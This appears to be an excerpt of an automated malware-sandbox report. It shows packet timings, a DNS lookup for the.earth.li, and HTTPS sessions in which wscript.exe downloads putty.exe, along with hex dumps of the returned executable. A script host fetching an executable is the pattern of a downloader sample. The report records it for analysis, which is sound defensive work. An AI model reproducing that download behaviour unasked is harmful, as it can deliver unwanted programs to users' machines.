                  Jan 13, 2023 16:04:35.522449017 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522505045 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.522525072 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.522582054 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524136066 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524214029 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524255037 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524271965 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524282932 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524657011 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524734020 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524744987 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.524776936 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.524816036 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.525770903 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.525850058 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.525885105 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.525903940 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.525924921 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.525954008 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526634932 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526736021 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526752949 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526822090 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526827097 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526844025 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.526890039 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.526907921 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.527530909 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.527633905 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.528646946 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.528752089 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.528763056 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.528825998 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.528831005 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.528886080 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.529357910 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.529439926 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.529491901 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.529587030 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.529614925 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.529676914 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.529741049 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.529803991 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.529881001 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.529946089 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.529947996 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.529964924 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.530050039 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.530780077 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.530895948 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.530958891 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531039953 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.531073093 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531157017 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531187057 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.531193972 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531277895 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531311989 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.531312943 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.531323910 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531358957 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531394005 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.531394005 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.531411886 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.531419992 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.531475067 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.532181978 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.532275915 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.532351971 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.532469034 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.532530069 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.532607079 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.532635927 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.532707930 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.532752991 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.532818079 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.532861948 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533019066 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533023119 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533047915 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533070087 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533077955 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533152103 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533152103 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533160925 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533266068 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533302069 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533308029 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533332109 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533339024 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533369064 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533374071 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533421040 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533473969 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533485889 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533557892 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533627033 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533734083 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.533744097 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.533837080 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.534070015 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.534162998 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.535106897 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.535281897 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.535327911 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.535346031 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.535373926 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.535418034 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.536012888 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.536123991 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.536161900 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.536227942 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.536258936 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.536268950 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.536392927 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.536392927 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.537260056 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.537379980 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.537389040 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.537528992 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.566800117 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.566828966 CET4434970093.93.131.124192.168.2.3

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 13, 2023 16:04:34.594888926 CET5892153192.168.2.38.8.8.8
                  Jan 13, 2023 16:04:34.615468025 CET53589218.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 13, 2023 16:04:34.594888926 CET192.168.2.38.8.8.80xcceStandard query (0)the.earth.liA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 13, 2023 16:04:34.615468025 CET8.8.8.8192.168.2.30xcceNo error (0)the.earth.li93.93.131.124A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • the.earth.li

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.34969993.93.131.124443C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  2023-01-13 15:04:35 UTC0OUTGET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1
                  Accept: */*
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: the.earth.li
                  Connection: Keep-Alive
                  2023-01-13 15:04:35 UTC0INHTTP/1.1 302 Found
                  Date: Fri, 13 Jan 2023 15:04:35 GMT
                  Server: Apache
                  Location: https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exe
                  Content-Length: 302
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  2023-01-13 15:04:35 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 37 38 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exe">here</a>.</p><hr><address>Apache Server at


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.34970093.93.131.124443C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  2023-01-13 15:04:35 UTC0OUTGET /~sgtatham/putty/0.78/w32/putty.exe HTTP/1.1
                  Accept: */*
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: the.earth.li
                  Connection: Keep-Alive
                  2023-01-13 15:04:35 UTC1INHTTP/1.1 200 OK
                  Date: Fri, 13 Jan 2023 15:04:35 GMT
                  Server: Apache
                  Last-Modified: Fri, 28 Oct 2022 17:30:02 GMT
                  ETag: "168b28-5ec1b9b96afd8"
                  Accept-Ranges: bytes
                  Content-Length: 1477416
                  Connection: close
                  Content-Type: application/x-msdos-program
                  2023-01-13 15:04:35 UTC1INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 85 10 5c 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 52 0c 00 00 dc 09 00 00 00 00 00 36 e1 09 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 16 00 00 04 00 00 d4 29 17 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ce 0f 00 b4 00 00
                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL\cR6@)@X
                  2023-01-13 15:04:35 UTC9INData Raw: 04 50 6a ff ff 15 44 d7 4f 00 89 c3 83 c0 01 83 f8 02 72 30 ff 34 24 6a 00 6a 00 6a 02 53 ff 15 b8 d8 4f 00 85 c0 74 1c ff 34 24 ff 37 50 89 44 24 14 e8 fa d8 09 00 83 c4 0c ff 74 24 08 ff 15 30 d9 4f 00 57 e8 a7 6b 03 00 83 c4 04 ff 34 24 53 56 68 04 e1 4d 00 e8 d5 5a 03 00 83 c4 10 89 c6 bf 01 00 00 00 e9 a0 07 00 00 3d 80 01 00 00 0f 84 45 08 00 00 3d 90 01 00 00 0f 85 ae 08 00 00 6a 01 68 d4 70 4c 00 ff 35 38 17 50 00 89 d6 e8 7c db 00 00 89 f2 83 c4 0c e9 25 09 00 00 83 f8 50 0f 84 1f 08 00 00 83 f8 60 0f 85 7e 08 00 00 ff 35 38 17 50 00 89 d6 e8 53 b4 00 00 e9 fc 08 00 00 3d a0 01 00 00 0f 84 4d 08 00 00 3d 70 f0 00 00 0f 85 56 08 00 00 81 fd 12 01 00 00 0f 85 df 08 00 00 c6 05 cb 1d 50 00 01 52 53 68 12 01 00 00 57 ff 15 88 d5 4f 00 89 c6 c6 05 cb
                  Data Ascii: PjDOr04$jjjSOt4$7PD$t$0OWk4$SVhMZ=E=jhpL58P|%P`~58PS=M=pVPRShWO
                  2023-01-13 15:04:35 UTC17INData Raw: 50 00 e8 9a 29 03 00 83 c4 08 0f b6 f8 8d 2c fd 00 00 00 00 68 8a 00 00 00 ff 35 f0 0b 50 00 e8 7d 29 03 00 83 c4 08 8d 3c fd 00 02 00 00 84 c0 0f 44 fd c6 05 18 17 50 00 01 e8 e2 c5 ff ff 6a 00 ff 74 24 5c 6a 00 6a 00 53 ff 74 24 18 68 00 00 00 80 68 00 00 00 80 56 8b 4c 24 24 89 cb 51 50 57 ff 15 7c d5 4f 00 a3 04 00 50 00 85 c0 75 1a ff 15 e8 d7 4f 00 50 e8 d4 81 03 00 83 c4 04 50 68 63 0b 4e 00 e8 66 08 00 00 c7 05 30 17 50 00 00 00 00 00 c7 05 2c 17 50 00 00 00 00 00 c7 05 28 17 50 00 00 00 00 00 c7 05 24 17 50 00 00 00 00 00 c7 05 20 17 50 00 00 00 00 00 c7 05 1c 17 50 00 00 00 00 00 83 3d 80 1d 50 00 00 74 4e 8b 0d 84 1d 50 00 85 c9 74 44 6a 01 50 ff d1 8d 4c 24 08 8d 54 24 18 51 52 6a 00 50 ff 15 80 1d 50 00 85 c0 75 15 8b 4c 24 18 89 0d 1c 17 50
                  Data Ascii: P),h5P})<DPjt$\jjSt$hhVL$$QPW|OPuOPPhcNf0P,P(P$P PP=PtNPtDjPL$T$QRjPPuL$P
                  2023-01-13 15:04:35 UTC24INData Raw: 00 5e 5b c3 68 75 04 00 00 68 ea 2f 4f 00 68 f4 88 4f 00 e8 7c 6a 0a 00 83 c4 0c e8 01 00 00 00 cc e8 9c 71 0a 00 cc cc cc cc cc cc cc cc cc cc cc 57 56 83 3d a4 17 50 00 00 74 17 68 f7 12 00 00 68 ea 2f 4f 00 68 28 2d 4f 00 e8 44 6a 0a 00 83 c4 0c a1 04 00 50 00 31 ff 85 c0 74 1e 50 ff 15 e4 d5 4f 00 85 c0 74 13 89 c6 6a 00 ff 35 78 17 50 00 50 ff 15 f4 d4 4f 00 89 f7 89 3d a4 17 50 00 85 ff 0f 95 c0 5e 5f c3 cc cc cc cc cc cc cc 55 53 57 56 83 ec 08 8d 7c 24 38 8b 6c 24 30 8b 5c 24 2c 8b 74 24 28 8b 54 24 24 8b 4c 24 20 85 ed 78 1b 8b 07 8b 7f 04 57 50 ff 74 24 3c 55 53 56 e8 8a 1e 00 00 83 c4 20 e9 59 02 00 00 b9 01 00 00 00 83 fb 02 7c 25 0f b7 06 25 00 fc 00 00 3d 00 d8 00 00 75 16 0f b7 46 02 25 00 fc 00 00 31 c9 3d 00 dc 00 00 0f 94 c1 83 c1 01 89
                  Data Ascii: ^[huh/OhO|jqWV=Pthh/Oh(-ODjP1tPOtj5xPPO=P^_USWV|$8l$0\$,t$(T$$L$ xWPt$<USV Y|%%=uF%1=
                  2023-01-13 15:04:35 UTC32INData Raw: 17 50 00 50 ff 15 f4 d4 4f 00 89 fe 89 f0 5e 5f c3 55 53 57 56 81 ec ac 00 00 00 89 54 24 14 89 ca 8b bc 24 cc 00 00 00 a1 34 00 50 00 31 e0 31 db 89 f9 83 e1 03 0f 95 c3 83 c3 01 0f af 1d 00 17 50 00 8b 8c 24 c8 00 00 00 89 0c 24 c1 e9 16 80 e1 01 89 84 24 a8 00 00 00 89 de d3 e3 83 e7 03 74 15 8d 04 12 8b 0d 38 17 50 00 3b 81 2c 01 00 00 0f 8d 53 0f 00 00 a1 04 17 50 00 31 ed f7 84 24 c8 00 00 00 00 00 00 40 75 0a c7 44 24 0c 00 00 00 00 eb 49 83 3d b0 17 50 00 00 74 0f 8b 0d 38 17 50 00 80 b9 43 01 00 00 00 74 de 8b 0d b0 78 4c 00 8d ac 24 d0 00 00 00 89 4d 04 89 4d 00 31 ed 8b 8c 24 c8 00 00 00 81 e1 00 00 cc fe 81 c9 04 0b 02 00 89 0c 24 b1 01 89 4c 24 0c 0f af f2 89 f2 8b 4c 24 14 0f af c8 89 4c 24 14 c7 44 24 08 01 00 00 00 85 ff 89 5c 24 1c 74 09
                  Data Ascii: PPO^_USWVT$$4P11P$$$t8P;,SP1$@uD$I=Pt8PCtxL$MM1$$L$L$L$D$\$t
                  2023-01-13 15:04:35 UTC40INData Raw: 44 24 44 39 c6 0f 4c f0 d9 c0 d8 84 24 b0 00 00 00 d8 84 24 b4 00 00 00 d8 84 24 b8 00 00 00 d9 7c 24 02 0f b7 44 24 02 0d 00 0c 00 00 66 89 44 24 16 d9 6c 24 16 db 5c 24 48 d9 6c 24 02 8b 44 24 48 39 c6 0f 4c f0 d8 84 24 bc 00 00 00 d8 84 24 c0 00 00 00 d8 84 24 c4 00 00 00 d9 3c 24 0f b7 04 24 0d 00 0c 00 00 66 89 44 24 14 d9 6c 24 14 db 5c 24 4c d9 2c 24 8b 44 24 4c 39 c6 0f 4c f0 eb 03 8b 76 18 8b 8c 24 c8 00 00 00 31 e1 e8 bd 33 09 00 89 f0 81 c4 cc 00 00 00 5e c3 cc cc cc ff 35 04 00 50 00 ff 15 58 d6 4f 00 85 c0 74 15 6a f0 ff 35 04 00 50 00 ff 15 28 d6 4f 00 a9 00 00 c0 00 74 2e ff 35 04 00 50 00 ff 15 58 d6 4f 00 85 c0 74 05 e9 a6 01 00 00 6a 00 6a 00 68 03 80 00 00 ff 35 04 00 50 00 ff 15 bc d6 4f 00 6a 03 eb 02 6a 09 ff 35 04 00 50 00 ff 15 0c
                  Data Ascii: D$D9L$$$|$D$fD$l$\$Hl$D$H9L$$$<$$fD$l$\$L,$D$L9Lv$13^5PXOtj5P(Ot.5PXOtjjh5POjj5P
                  2023-01-13 15:04:35 UTC48INData Raw: 83 c4 18 8d 8b ff ff fe ff 81 f9 fe ff 0f 00 0f 87 3c ff ff ff 8d 93 00 00 ff 03 c1 ea 0a 81 c2 00 d8 ff ff 8d 4f 01 81 e3 ff 03 00 00 81 cb 00 dc 00 00 66 89 5c 78 02 e9 18 ff ff ff 90 90 90 90 81 4c 24 48 00 00 00 80 8b 44 24 30 8b 4c 24 10 eb 18 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 44 24 30 8b 4c 24 10 89 fa 8b 6c 24 08 8b 5c 24 18 84 db 0f 85 a8 00 00 00 89 54 24 04 8b 3c 24 8b 47 18 8b 4c 24 10 8b 0c 88 89 ea ff 74 24 44 e8 4a a7 00 00 8b 4c 24 14 83 c4 04 8b 47 18 8b 04 88 8b 40 14 89 ee 8b 6c 24 64 8b 54 24 28 89 14 28 8b 47 18 8b 04 88 8b 40 14 8b 54 24 2c 89 54 28 04 8b 47 18 8b 04 88 8b 40 14 8b 5c 24 40 89 5c 28 0c 8b 54 24 0c 89 54 28 08 89 f5 89 d8 c1 e8 10 89 44 24 54 89 d0 c1 e8 10 89 44 24 5c c1 eb 18 89 5c 24 50 c1 ea 18 89 54 24
                  Data Ascii: <Of\xL$HD$0L$D$0L$l$\$T$<$GL$t$DJL$G@l$dT$((G@T$,T(G@\$@\(T$T(D$TD$\\$PT$
                  2023-01-13 15:04:35 UTC56INData Raw: 10 00 00 01 c6 86 55 01 00 00 00 68 3c 13 4f 00 e8 0c 01 03 00 83 c4 04 89 86 2c 11 00 00 68 3c 13 4f 00 e8 f9 00 03 00 83 c4 04 89 86 30 11 00 00 c7 86 38 11 00 00 00 00 00 00 c7 86 34 11 00 00 00 00 00 00 c6 86 3c 11 00 00 00 c7 86 d4 20 00 00 00 00 00 00 c6 86 bc 20 00 00 00 c6 86 be 20 00 00 00 c6 86 c0 20 00 00 00 66 c7 86 c2 20 00 00 00 00 c6 86 c4 20 00 00 00 66 c7 86 c6 20 00 00 00 00 c6 86 c8 20 00 00 00 c7 86 a0 20 00 00 00 00 00 00 c7 86 a4 20 00 00 00 00 00 00 c7 86 a8 20 00 00 00 00 00 00 c7 86 ac 20 00 00 00 00 00 00 c6 86 b0 20 00 00 00 e8 62 c1 00 00 89 86 40 11 00 00 89 f1 31 d2 e8 13 00 00 00 89 f0 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 0c 89 54 24 04 89 ce 8d 81 56 14 00 00 68 06 01 00 00 6a 01 50 e8 30 22
                  Data Ascii: Uh<O,h<O084< f f b@1^_[]USWVT$VhjP0"
                  2023-01-13 15:04:35 UTC63INData Raw: 0c 00 0f 84 49 fb ff ff ff 76 14 e8 31 8b 02 00 83 c4 04 56 e8 28 8b 02 00 83 c4 04 e9 30 fb ff ff 8b 47 60 8b 7f 64 8d 4c 24 4c 31 f6 31 d2 57 50 6a 00 e8 69 7e 00 00 83 c4 0c 8b 94 24 c8 00 00 00 85 d2 7e 67 8b bc 24 c4 00 00 00 0f b6 ac 24 c0 00 00 00 31 c9 eb 11 90 90 90 90 90 90 90 90 89 d9 83 c6 01 39 f2 74 3e 89 cb 8b 04 b7 85 c0 74 ee b1 01 83 f8 01 74 e9 8b 4c 24 14 8b 91 5c 10 00 00 8b 0a 55 ff 74 24 54 ff 74 24 6c ff 74 24 68 ff 74 24 64 50 52 ff 51 2c 8b 94 24 e4 00 00 00 83 c4 1c eb b9 f6 c1 01 75 26 ff 74 24 54 e8 8b 8a 02 00 83 c4 04 ff 74 24 5c e8 7f 8a 02 00 83 c4 04 ff 74 24 64 e8 73 8a 02 00 83 c4 04 eb 56 8b 74 24 14 ff b6 08 11 00 00 e8 5f 8a 02 00 83 c4 04 ff b6 0c 11 00 00 e8 51 8a 02 00 83 c4 04 ff b6 10 11 00 00 e8 43 8a 02 00 83
                  Data Ascii: Iv1V(0G`dL$L11WPji~$~g$$19t>ttL$\Ut$Tt$lt$ht$dPRQ,$u&t$Tt$\t$dsVt$_QC
                  2023-01-13 15:04:35 UTC71INData Raw: 83 bc 00 00 00 8b 04 24 8b 00 83 f8 04 0f 8f b3 00 00 00 83 c2 fb 83 fa 16 0f 87 42 22 00 00 ff 24 95 34 7b 4c 00 f6 06 01 0f 84 1b 02 00 00 83 be 58 10 00 00 00 0f 84 25 22 00 00 8b 86 a8 10 00 00 89 44 24 10 89 6c 24 08 8b ae ac 10 00 00 89 eb 01 eb 6a 00 6a 02 53 e8 13 6b 02 00 83 c4 0c 89 c7 53 50 55 8b 6c 24 14 ff 74 24 1c 6a 00 6a 00 e8 7a bd 02 00 83 c4 18 89 f1 89 fa 50 e8 0d e5 ff ff 83 c4 04 89 c3 57 e8 72 6b 02 00 83 c4 04 6a 00 ff 73 08 ff 33 ff b6 58 10 00 00 e8 dd 9e 00 00 83 c4 10 53 e8 44 71 02 00 83 c4 04 e9 ac 21 00 00 90 90 90 90 90 90 90 90 90 90 90 90 8b 04 24 8b 00 83 f8 0e 0f 87 92 21 00 00 ff 24 85 90 7b 4c 00 89 f1 e8 74 6d 00 00 8b 44 24 48 89 86 68 10 00 00 e9 75 21 00 00 8b 04 24 c7 00 00 00 00 00 8d 42 d0 83 f8 09 0f 87 60 03
                  Data Ascii: $B"$4{LX%"D$l$jjSkSPUl$t$jjzPWrkjs3XSDq!$!${LtmD$Hhu!$B`
                  2023-01-13 15:04:35 UTC79INData Raw: f7 df 8b 96 a4 00 00 00 89 f1 6a 01 57 ff b6 a8 00 00 00 e8 99 24 00 00 83 c4 0c c6 86 ae 00 00 00 00 e9 d3 02 00 00 f6 06 01 0f 84 f1 02 00 00 89 6c 24 08 8b 86 88 01 00 00 8b 8e 2c 01 00 00 39 c8 0f 47 c1 89 86 88 01 00 00 85 c0 bf 01 00 00 00 0f 45 f8 8b 96 94 00 00 00 8b 9e 98 00 00 00 89 f1 6a 01 68 45 13 00 00 e8 52 9c ff ff 83 c4 08 89 f1 89 44 24 24 89 c2 e8 02 2a 00 00 8b ae 2c 01 00 00 8b 86 94 00 00 00 8b 96 98 00 00 00 29 d5 39 ef 0f 4e ef 89 c7 89 f1 89 54 24 10 50 e8 bb 27 00 00 83 c4 04 8b 96 98 00 00 00 01 ea 89 f1 ff b6 94 00 00 00 e8 a3 27 00 00 83 c4 04 8b 96 34 0e 00 00 8b 8e 38 0e 00 00 31 c0 3b 8e 98 00 00 00 0f 9f c0 31 c9 3b 96 94 00 00 00 0f 9f c1 0f 44 c8 80 f9 01 75 4d 8b 4c 24 10 01 e9 31 c0 39 8e 30 0e 00 00 0f 9c c0 31 c9 39
                  Data Ascii: jW$l$,9GEjhERD$$*,)9NT$P''481;1;DuML$19019
